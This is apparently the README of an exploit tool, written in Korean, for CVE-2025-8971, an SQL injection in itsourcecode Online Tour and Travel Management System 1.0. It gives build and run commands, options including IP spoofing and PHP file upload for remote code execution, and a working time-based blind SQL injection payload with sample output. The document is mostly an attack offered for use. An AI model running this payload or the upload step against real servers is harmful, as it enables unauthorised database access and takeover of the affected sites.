
itsourcecode Online Tour and Travel Management System 1.0의 SQL 인젝션
작성자: Byte Reaper
이 익스플로잇은 itsourcecode Online Tour and Travel Management System 1.0의 SQL 인젝션 취약점인 CVE-2025-8971을 대상으로 합니다. 취약점은 /admin/operations/travellers.php에 존재하며, val-username 매개변수를 통해 원격으로 악용될 수 있습니다.
작동 방식
익스플로잇은 대상 URL에 조작된 HTTP POST 요청을 보냅니다.
페이로드는 인코딩되어 val-username에 주입됩니다.
선택적 파일 업로드(.php 또는 이미지)를 사용하여 원격 코드 실행을 달성할 수 있습니다.
스크립트는 응답을 확인하여 페이로드가 성공적으로 실행되었는지 검증합니다.
GCC compiler (gcc)
Linux x86_64
ibcurl
gcc script.c argparse.c -o CVE-2025-8971 -lcurl
./CVE-2025-8971 -u http://<target> -v [verbose mode]
-h, --help 도움말 메시지
-u, --url 대상 URL (기본 URL)
-c, --cookies 쿠키 파일
-i, --ip 가짜 IP (호스트 요청)
-f, --file 파일 업로드 (.php / 이미지)
-v, --verbose 상세 모드
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....
MIT 라이선스